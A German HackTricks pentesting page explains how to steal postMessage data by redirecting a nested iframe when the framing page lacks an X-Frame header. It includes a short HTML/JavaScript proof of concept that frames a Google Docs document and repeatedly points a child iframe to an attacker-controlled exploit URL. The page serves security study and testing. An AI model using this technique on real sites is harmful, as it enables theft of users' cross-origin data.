hacktricks/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
2024-02-10 15:36:32 +00:00

3.8 KiB

PostMessage stehlen, indem die Iframe-Position geändert wird

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Ändern der Position von Iframes

Laut diesem Bericht können Sie, wenn Sie eine Webseite ohne X-Frame-Header in ein Iframe einbinden, das ein weiteres Iframe enthält, die Position dieses untergeordneten Iframes ändern.

Zum Beispiel, wenn abc.com efg.com als Iframe enthält und abc.com keinen X-Frame-Header hat, könnte ich mit frames.location efg.com zu evil.com im Cross-Origin-Modus ändern.

Dies ist besonders nützlich bei postMessages, da es möglich ist, wenn eine Seite sensible Daten mit einem Platzhalter wie windowRef.postmessage("","*") sendet, die Position des zugehörigen Iframes (untergeordnet oder übergeordnet) zu einer von Angreifern kontrollierten Position zu ändern und diese Daten zu stehlen.

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!